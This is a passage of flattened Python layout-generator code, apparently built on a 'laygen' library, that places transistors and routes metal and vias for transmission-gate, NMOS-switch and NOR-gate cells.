np.array([1, 0]), refinstname=ip1.name, gridname=rg_m1m2) # pin if create_pin == True: create_io_pin(laygen, layer=laygen.layers['pin'][3], gridname=rg_m2m3_pin, pinname_list = ['I', 'O'], rect_list=[ri0, ro0]) create_power_pin(laygen, layer=laygen.layers['pin'][2], gridname=rg_m1m2, rect_vdd=rvdd, rect_vss=rvss) def generate_tgate(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, routing_grid_m2m3, routing_grid_m1m2_pin, routing_grid_m2m3_pin, devname_nmos_boundary, devname_nmos_body, devname_nmos_space, devname_pmos_boundary, devname_pmos_body, devname_pmos_space, m=1, origin=np.array([0,0]), create_pin=False): pg = placement_grid rg_m1m2 = routing_grid_m1m2 rg_m2m3 = routing_grid_m2m3 rg_m1m2_pin = routing_grid_m1m2_pin rg_m2m3_pin = routing_grid_m2m3_pin m = max(1, int(m / 2)) # using nf=2 devices # placement in_space = laygen.place("I"+objectname_pfix+'NDMY', devname_nmos_space, pg, shape=np.array([2, 1]), xy=origin) in0 = laygen.relplace(name = "I" + objectname_pfix + 'N0', templatename = devname_nmos_boundary, gridname = pg, refinstname = in_space.name) in1 = laygen.relplace(name = "I"+objectname_pfix+'N1', templatename = devname_nmos_body, gridname = pg, refinstname = in0.name, shape=np.array([m, 1])) in2 = laygen.relplace(name = "I"+objectname_pfix+'N2', templatename = devname_nmos_boundary, gridname = pg, refinstname = in1.name) ip_space = laygen.relplace(name = "I"+objectname_pfix+'PDMY', templatename = devname_pmos_space, gridname = pg, refinstname = in_space.name, direction='top', transform='MX', shape=np.array([2, 1])) ip0 = laygen.relplace(name = "I"+objectname_pfix+'P0', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip_space.name, transform='MX') ip1 = laygen.relplace(name = "I"+objectname_pfix+'P2', templatename = devname_pmos_body, gridname = pg, refinstname = ip0.name, transform='MX', shape=np.array([m, 1])) ip2 = laygen.relplace(name = "I"+objectname_pfix+'P3', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip1.name, transform='MX') # route # en, enb for i in range(m): laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='G0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 0]), refinstname=ip1.name, refpinname='G0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-3, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='G0', refinstindex0=np.array([0, 0]), refinstname1=in1.name, refpinname1='G0', refinstindex1=np.array([m-1, 0])) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-3, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=ip1.name, refpinname0='G0', refinstindex0=np.array([0, 0]), refinstname1=ip1.name, refpinname1='G0', refinstindex1=np.array([m-1, 0])) ren0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([-3, 0]), xy1=np.array([-3, 2]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='G0', refinstname1=in1.name, refpinname1='G0') laygen.via(None, np.array([-3, 0]), refinstname=in1.name, refpinname='G0', gridname=rg_m2m3) renb0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([-2, 0]), xy1=np.array([-2, 2]), gridname0=rg_m2m3, refinstname0=ip1.name, refpinname0='G0', refinstname1=ip1.name, refpinname1='G0') laygen.via(None, np.array([-2, 0]), refinstname=ip1.name, refpinname='G0', gridname=rg_m2m3) #input laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='S0', refinstindex0=np.array([0, 0]), refinstname1=in1.name, refpinname1='S1', refinstindex1=np.array([m-1, 0])) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=ip1.name, refpinname0='S0', refinstindex0=np.array([0, 0]), refinstname1=ip1.name, refpinname1='S1', refinstindex1=np.array([m-1, 0])) for i in range(m): laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='S0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 0]), refinstname=ip1.name, refpinname='S0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='S1', refinstindex=np.array([m-1, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 0]), refinstname=ip1.name, refpinname='S1', refinstindex=np.array([m-1, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='S0', refinstindex=np.array([0, 0]), gridname=rg_m2m3) laygen.via(None, np.array([0, 0]), refinstname=ip1.name, refpinname='S0', refinstindex=np.array([0, 0]), gridname=rg_m2m3) ri0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='S0', refinstindex0=np.array([0, 0]), refinstname1=ip1.name, refpinname1='S0', refinstindex1=np.array([0, 0])) #output laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 1]), xy1=np.array([0, 1]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='S0', refinstindex0=np.array([0, 0]), refinstname1=in1.name, refpinname1='S1', refinstindex1=np.array([m-1, 0])) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 1]), xy1=np.array([0, 1]), gridname0=rg_m2m3, refinstname0=ip1.name, refpinname0='S0', refinstindex0=np.array([0, 0]), refinstname1=ip1.name, refpinname1='S1', refinstindex1=np.array([m-1, 0])) for i in range(m): laygen.via(None, np.array([0, 1]), refinstname=in1.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 1]), refinstname=ip1.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 1]), refinstname=in1.name, refpinname='D0', refinstindex=np.array([m-1, 0]), gridname=rg_m2m3) laygen.via(None, np.array([0, 1]), refinstname=ip1.name, refpinname='D0', refinstindex=np.array([m-1, 0]), gridname=rg_m2m3) ro0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 1]), xy1=np.array([0, 1]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='D0', refinstindex0=np.array([m-1, 0]), refinstname1=ip1.name, refpinname1='D0', refinstindex1=np.array([m-1, 0])) # power and groud rail xy = laygen.get_xy(obj = in2.template, gridname = rg_m1m2) * np.array([1, 0]) rvdd = laygen.route("R"+objectname_pfix+"VDD0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=ip_space.name, refinstname1=ip2.name) rvss = laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=in_space.name, refinstname1=in2.name) # pin if create_pin == True: create_io_pin(laygen, layer=laygen.layers['pin'][3], gridname=rg_m2m3_pin, pinname_list = ['EN', 'ENB', 'I', 'O'], rect_list=[ren0, renb0, ri0, ro0]) create_power_pin(laygen, layer=laygen.layers['pin'][2], gridname=rg_m1m2, rect_vdd=rvdd, rect_vss=rvss) def generate_nsw(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, routing_grid_m2m3, routing_grid_m1m2_pin, routing_grid_m2m3_pin, devname_nmos_boundary, devname_nmos_body, devname_nmos_space, devname_pmos_boundary, devname_pmos_body, devname_pmos_space, m=1, origin=np.array([0,0]), create_pin=False): #generate an nmos type switch pg = placement_grid rg_m1m2 = routing_grid_m1m2 rg_m2m3 = routing_grid_m2m3 rg_m1m2_pin = routing_grid_m1m2_pin rg_m2m3_pin = routing_grid_m2m3_pin m = max(1, int(m / 2)) # using nf=2 devices # placement in0 = laygen.place("I" + objectname_pfix + 'N0', devname_nmos_boundary, pg, xy=origin) in1 = laygen.relplace(name = "I"+objectname_pfix+'N1', templatename = devname_nmos_body, gridname = pg, refinstname = in0.name, shape=np.array([m, 1])) in2 = laygen.relplace(name = "I"+objectname_pfix+'N2', templatename = devname_nmos_boundary, gridname = pg, refinstname = in1.name) ip0 = laygen.relplace(name = "I"+objectname_pfix+'P0', templatename = devname_pmos_space, gridname = pg, refinstname = in0.name, direction='top', transform='MX') ip1 = laygen.relplace(name = "I"+objectname_pfix+'P2', templatename = devname_pmos_space, gridname = pg, refinstname = ip0.name, transform='MX', shape=np.array([m*2, 1])) ip2 = laygen.relplace(name = "I"+objectname_pfix+'P3', templatename = devname_pmos_space, gridname = pg, refinstname = ip1.name, transform='MX') #ip0 = laygen.relplace(name = "I"+objectname_pfix+'P0', templatename = devname_pmos_space, gridname = pg, refinstname = in0.name, direction='top', transform='MX') #ip1 = laygen.relplace(name = "I"+objectname_pfix+'P2', templatename = devname_pmos_space, gridname = pg, refinstname = ip0.name, transform='MX', shape=np.array([m*2, 1])) #ip2 = laygen.relplace(name = "I"+objectname_pfix+'P3', templatename = devname_pmos_space, gridname = pg, refinstname = ip1.name, transform='MX') # route # en, enb for i in range(m): laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='G0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 0]), xy1=np.array([1, 0]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='G0', refinstindex0=np.array([0, 0]), refinstname1=in1.name, refpinname1='G0', refinstindex1=np.array([m-1, 0])) ren0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([-1, 0]), xy1=np.array([-1, 2]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='G0', refinstname1=in1.name, refpinname1='G0') laygen.via(None, np.array([-1, 0]), refinstname=in1.name, refpinname='G0', gridname=rg_m2m3) #input laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1+1, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='S0', refinstindex0=np.array([0, 0]), refinstname1=in1.name, refpinname1='S1', refinstindex1=np.array([m-1, 0])) for i in range(m): laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='S0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='S1', refinstindex=np.array([m-1, 0]), gridname=rg_m1m2) ri=[] for i in range(m): laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='S1', refinstindex=np.array([i, 0]), gridname=rg_m2m3) ri0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 4]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='S1', refinstindex0=np.array([i, 0]), refinstname1=in1.name, refpinname1='S1', refinstindex1=np.array([i, 0])) ri.append(ri0) #output laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1+1, 1]), xy1=np.array([0, 1]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='S0', refinstindex0=np.array([0, 0]), endstyle0='extend', refinstname1=in1.name, refpinname1='S1', refinstindex1=np.array([m-1, 0]), endstyle1='extend') for i in range(m): laygen.via(None, np.array([0, 1]), refinstname=in1.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) ro=[] for i in range(m): laygen.via(None, np.array([0, 1]), refinstname=in1.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m2m3) ro0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 1]), xy1=np.array([0, 4]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='D0', refinstindex0=np.array([i, 0]), refinstname1=in1.name, refpinname1='D0', refinstindex1=np.array([i, 0])) ro.append(ro0) # power and groud rail xy = laygen.get_xy(obj = in2.template, gridname = rg_m1m2) * np.array([1, 0]) rvdd = laygen.route("R"+objectname_pfix+"VDD0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip2.name) rvss = laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in2.name) # pin if create_pin == True: create_io_pin(laygen, layer=laygen.layers['pin'][3], gridname=rg_m2m3_pin, pinname_list = ['EN', 'I', 'O'], rect_list=[ren0, ri[0], ro[0]]) create_power_pin(laygen, layer=laygen.layers['pin'][2], gridname=rg_m1m2, rect_vdd=rvdd, rect_vss=rvss) def generate_nsw_wovdd(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, routing_grid_m2m3, routing_grid_m1m2_pin, routing_grid_m2m3_pin, devname_nmos_boundary, devname_nmos_body, devname_nmos_space, m=1, origin=np.array([0,0]), create_pin=False): #generate an nmos type switch, without vdd rail pg = placement_grid rg_m1m2 = routing_grid_m1m2 rg_m2m3 = routing_grid_m2m3 rg_m1m2_pin = routing_grid_m1m2_pin rg_m2m3_pin = routing_grid_m2m3_pin m = max(1, int(m / 2)) # using nf=2 devices # placement in0 = laygen.place("I"+objectname_pfix+'N0', devname_nmos_boundary, pg, xy=origin) in1 = laygen.relplace(name = "I"+objectname_pfix+'N1', templatename = devname_nmos_body, gridname = pg, refinstname = in0.name, shape=np.array([m, 1])) in2 = laygen.relplace(name = "I"+objectname_pfix+'N2', templatename = devname_nmos_boundary, gridname = pg, refinstname = in1.name) in0b= laygen.relplace(name = "I"+objectname_pfix+'N0B', templatename = devname_nmos_boundary, gridname = pg, refinstname = in0.name, direction='top', transform='MX') in1b= laygen.relplace(name = "I"+objectname_pfix+'N2B', templatename = devname_nmos_body, gridname = pg, refinstname = in0b.name, transform='MX', shape=np.array([m, 1])) in2b= laygen.relplace(name = "I"+objectname_pfix+'N3B', templatename = devname_nmos_boundary, gridname = pg, refinstname = in1b.name, transform='MX') # route # en, enb for i in range(m): laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='G0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 0]), xy1=np.array([1, 0]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='G0', refinstindex0=np.array([0, 0]), refinstname1=in1.name, refpinname1='G0', refinstindex1=np.array([m-1, 0])) ren0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([-1, 0]), xy1=np.array([-1, 2]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='G0', refinstname1=in1.name, refpinname1='G0') laygen.via(None, np.array([-1, 0]), refinstname=in1.name, refpinname='G0', gridname=rg_m2m3) for i in range(m): laygen.via(None, np.array([0, 0]), refinstname=in1b.name, refpinname='G0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 0]), xy1=np.array([1, 0]), gridname0=rg_m1m2, refinstname0=in1b.name, refpinname0='G0', refinstindex0=np.array([0, 0]), refinstname1=in1b.name, refpinname1='G0', refinstindex1=np.array([m-1, 0])) laygen.via(None, np.array([-1, 0]), refinstname=in1b.name, refpinname='G0', gridname=rg_m2m3) #input laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1+1, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='S0', refinstindex0=np.array([0, 0]), refinstname1=in1.name, refpinname1='S1', refinstindex1=np.array([m-1, 0])) for i in range(m): laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='S0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='S1', refinstindex=np.array([m-1, 0]), gridname=rg_m1m2) ri=[] for i in range(m): laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='S1', refinstindex=np.array([i, 0]), gridname=rg_m2m3) ri0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 4]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='S1', refinstindex0=np.array([i, 0]), refinstname1=in1.name, refpinname1='S1', refinstindex1=np.array([i, 0])) ri.append(ri0) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1+1, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=in1b.name, refpinname0='S0', refinstindex0=np.array([0, 0]), refinstname1=in1b.name, refpinname1='S1', refinstindex1=np.array([m-1, 0])) for i in range(m): laygen.via(None, np.array([0, 0]), refinstname=in1b.name, refpinname='S0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 0]), refinstname=in1b.name, refpinname='S1', refinstindex=np.array([m-1, 0]), gridname=rg_m1m2) for i in range(m): laygen.via(None, np.array([0, 0]), refinstname=in1b.name, refpinname='S1', refinstindex=np.array([i, 0]), gridname=rg_m2m3) laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 4]), gridname0=rg_m2m3, refinstname0=in1b.name, refpinname0='S1', refinstindex0=np.array([i, 0]), refinstname1=in1b.name, refpinname1='S1', refinstindex1=np.array([i, 0])) #output laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1+1, 1]), xy1=np.array([0, 1]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='S0', refinstindex0=np.array([0, 0]), endstyle0='extend', refinstname1=in1.name, refpinname1='S1', refinstindex1=np.array([m-1, 0]), endstyle1='extend') for i in range(m): laygen.via(None, np.array([0, 1]), refinstname=in1.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) ro=[] for i in range(m): laygen.via(None, np.array([0, 1]), refinstname=in1.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m2m3) ro0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 1]), xy1=np.array([0, 4]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='D0', refinstindex0=np.array([i, 0]), refinstname1=in1.name, refpinname1='D0', refinstindex1=np.array([i, 0])) ro.append(ro0) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1+1, 1]), xy1=np.array([0, 1]), gridname0=rg_m2m3, refinstname0=in1b.name, refpinname0='S0', refinstindex0=np.array([0, 0]), endstyle0='extend', refinstname1=in1b.name, refpinname1='S1', refinstindex1=np.array([m-1, 0]), endstyle1='extend') for i in range(m): laygen.via(None, np.array([0, 1]), refinstname=in1b.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) for i in range(m): laygen.via(None, np.array([0, 1]), refinstname=in1b.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m2m3) laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 1]), xy1=np.array([0, 4]), gridname0=rg_m2m3, refinstname0=in1b.name, refpinname0='D0', refinstindex0=np.array([i, 0]), refinstname1=in1b.name, refpinname1='D0', refinstindex1=np.array([i, 0])) # power and groud rail xy = laygen.get_xy(obj = in2.template, gridname = rg_m1m2) * np.array([1, 0]) rvss = laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in2.name) rvss2 = laygen.route("R"+objectname_pfix+"VSS1", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=in0b.name, refinstname1=in2b.name) # pin if create_pin == True: create_io_pin(laygen, layer=laygen.layers['pin'][3], gridname=rg_m2m3_pin, pinname_list = ['EN', 'I', 'O'], rect_list=[ren0, ri[0], ro[0]]) rvss_pin_xy = laygen.get_xy(obj = rvss, gridname = rg_m1m2) rvss2_pin_xy = laygen.get_xy(obj = rvss2, gridname = rg_m1m2) laygen.pin(name='VSS0', layer=laygen.layers['pin'][2], xy=rvss_pin_xy, gridname=rg_m1m2, netname='VSS') laygen.pin(name='VSS1', layer=laygen.layers['pin'][2], xy=rvss2_pin_xy, gridname=rg_m1m2, netname='VSS') def generate_nor(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, routing_grid_m2m3, routing_grid_m1m2_pin, routing_grid_m2m3_pin, devname_nmos_boundary, devname_nmos_body, devname_pmos_boundary, devname_pmos_body, m=1, origin=np.array([0,0]), create_pin=False): pg = placement_grid rg_m1m2 = routing_grid_m1m2 rg_m2m3 = routing_grid_m2m3 rg_m1m2_pin = routing_grid_m1m2_pin rg_m2m3_pin = routing_grid_m2m3_pin m=max(1, int(m/2)) #using nf=2 devices # placement in0 = laygen.place("I"+objectname_pfix + 'N0', devname_nmos_boundary, pg, xy=origin) in1 = laygen.relplace(name = "I"+objectname_pfix + 'N1', templatename = devname_nmos_body, gridname = pg, refinstname = in0.name, shape=np.array([m, 1])) in2 = laygen.relplace(name = "I" + objectname_pfix + 'N2', templatename = devname_nmos_boundary, gridname = pg, refinstname = in1.name) in3 = laygen.relplace(name = "I" + objectname_pfix + 'N3', templatename = devname_nmos_boundary, gridname = pg, refinstname = in2.name) in4 = laygen.relplace(name = "I"+objectname_pfix + 'N4', templatename = devname_nmos_body, gridname = pg, refinstname = in3.name, shape=np.array([m, 1])) in5 = laygen.relplace(name = "I"+objectname_pfix + 'N5', templatename = devname_nmos_boundary, gridname = pg, refinstname = in4.name) ip0 = laygen.relplace(name = "I"+objectname_pfix + 'P0', templatename = devname_pmos_boundary, gridname = pg, refinstname = in0.name, direction='top', transform='MX') ip1 = laygen.relplace(name = "I"+objectname_pfix + 'P1', templatename = devname_pmos_body, gridname = pg, refinstname = ip0.name, transform='MX', shape=np.array([m, 1])) ip2 = laygen.relplace(name = "I"+objectname_pfix + 'P2', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip1.name, transform='MX') ip3 = laygen.relplace(name = "I"+objectname_pfix + 'P3', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip2.name, transform='MX') ip4 = laygen.relplace(name = "I"+objectname_pfix + 'P4', templatename = devname_pmos_body, gridname = pg, refinstname = ip3.name, transform='MX', shape=np.array([m, 1])) ip5 = laygen.relplace(name = "I"+objectname_pfix + 'P5', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip4.name, transform='MX') # route # b0 for i in range(m): laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='G0', refinstindex0=np.array([i, 0]), refinstname1=ip1.name, refpinname1='G0', refinstindex1=np.array([i, 0]), ) laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='G0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) if m == 1: laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 0]), xy1=np.array([1, 0]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='G0', refinstindex0=np.array([0, 0]), refinstname1=in1.name, refpinname1='G0', refinstindex1=np.array([m - 1, 0]), endstyle0="extend", endstyle1="extend") rb0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([-1, 0]), xy1=np.array([-1, 2]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='G0', refinstname1=in1.name, refpinname1='G0', endstyle0="extend", endstyle1="extend") laygen.via(None, np.array([-1, 0]), refinstname=in1.name, refpinname='G0', gridname=rg_m2m3) else: laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='G0', refinstindex0=np.array([0, 0]), refinstname1=in1.name, refpinname1='G0', refinstindex1=np.array([m - 1, 0])) rb0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 2]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='G0', refinstname1=in1.name, refpinname1='G0', endstyle0="extend", endstyle1="extend") laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='G0', gridname=rg_m2m3) # a0 for i in range(m): laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=in4.name, refpinname0='G0', refinstindex0=np.array([i, 0]), refinstname1=ip4.name, refpinname1='G0', refinstindex1=np.array([i, 0]), ) laygen.via(None, np.array([0, 0]), refinstname=ip4.name, refpinname='G0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) if m == 1: laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 0]), xy1=np.array([1, 0]), gridname0=rg_m1m2, refinstname0=ip4.name, refpinname0='G0', refinstindex0=np.array([0, 0]), refinstname1=ip4.name, refpinname1='G0', refinstindex1=np.array([m - 1, 0]), endstyle0="extend", endstyle1="extend") ra0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([-1, 0]), xy1=np.array([-1, 2]), gridname0=rg_m2m3, refinstname0=ip4.name, refpinname0='G0', refinstname1=ip4.name, refpinname1='G0', endstyle0="extend", endstyle1="extend") laygen.via(None, np.array([-1, 0]), refinstname=ip4.name, refpinname='G0', gridname=rg_m2m3) else: laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=ip4.name, refpinname0='G0', refinstindex0=np.array([0, 0]), refinstname1=ip4.name, refpinname1='G0', refinstindex1=np.array([m - 1, 0])) ra0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 2]), gridname0=rg_m2m3, refinstname0=ip4.name, refpinname0='G0', refinstname1=ip4.name, refpinname1='G0', endstyle0="extend", endstyle1="extend") laygen.via(None, np.array([0, 0]), refinstname=ip4.name, refpinname='G0', gridname=rg_m2m3) # internal connection between mos laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 1]), xy1=np.array([0, 1]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='D0', refinstname1=in4.name, refpinname1='D0', refinstindex1=np.array([m - 1, 0])) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 1]), xy1=np.array([0, 1]), gridname0=rg_m2m3, refinstname0=ip1.name, refpinname0='D0', refinstname1=ip4.name, refpinname1='S1', refinstindex1=np.array([m - 1, 0])) for i in range(m): laygen.via(None, np.array([0, 1]), refinstname=in1.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 1]), refinstname=ip1.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 1]), refinstname=in4.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 1]), refinstname=ip4.name, refpinname='S0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 1]), refinstname=ip4.name, refpinname='S1', refinstindex=np.array([m-1, 0]), gridname=rg_m1m2) # output if m==1: laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 0]), xy1=np.array([1, 0]), gridname0=rg_m2m3, refinstname0=ip4.name, refpinname0='D0', refinstindex0=np.array([0, 0]), refinstname1=ip4.name, refpinname1='D0', refinstindex1=np.array([m-1, 0]), endstyle0="extend", endstyle1="extend") else: laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=ip4.name, refpinname0='D0', refinstindex0=np.array([0, 0]), refinstname1=ip4.name, refpinname1='D0', refinstindex1=np.array([m-1, 0])) ro0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 1]), gridname0=rg_m2m3, refinstname0=ip4.name, refpinname0='D0', refinstindex0=np.array([m - 1, 0]), refinstname1=in4.name, refpinname1='D0', refinstindex1=np.array([m - 1, 0])) for i in range(m): laygen.via(None, np.array([0, 0]), refinstname=ip4.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 0]), refinstname=ip4.name, refpinname='D0', gridname=rg_m2m3, refinstindex=np.array([m - 1, 0])) laygen.via(None, np.array([0, 1]), refinstname=in4.name, refpinname='D0', gridname=rg_m2m3, refinstindex=np.array([m - 1, 0])) # power and ground route xy_s0 = laygen.get_template_pin_xy(ip1.cellname, 'S0', rg_m1m2)[0, :] for i in range(m): laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0 * np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2, refinstname0=ip1.name, refinstindex0=np.array([i, 0]), refinstname1=ip1.name, refinstindex1=np.array([i, 0])) laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0 * np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2, refinstname0=in1.name, refinstindex0=np.array([i, 0]), refinstname1=in1.name, refinstindex1=np.array([i, 0])) laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0 * np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2, refinstname0=in4.name, refinstindex0=np.array([i, 0]), refinstname1=in4.name, refinstindex1=np.array([i, 0])) laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=ip1.name, gridname=rg_m1m2, refinstindex=np.array([i, 0])) laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=in1.name, gridname=rg_m1m2, refinstindex=np.array([i, 0])) laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=in4.name, gridname=rg_m1m2, refinstindex=np.array([i, 0])) xy_s1 = laygen.get_template_pin_xy(ip1.cellname, 'S1', rg_m1m2)[0, :] for i in range(m): laygen.route(None, laygen.layers['metal'][1], xy0=xy_s1 * np.array([1, 0]), xy1=xy_s1, gridname0=rg_m1m2, refinstname0=ip1.name, refinstindex0=np.array([i, 0]), refinstname1=ip1.name, refinstindex1=np.array([i, 0])) 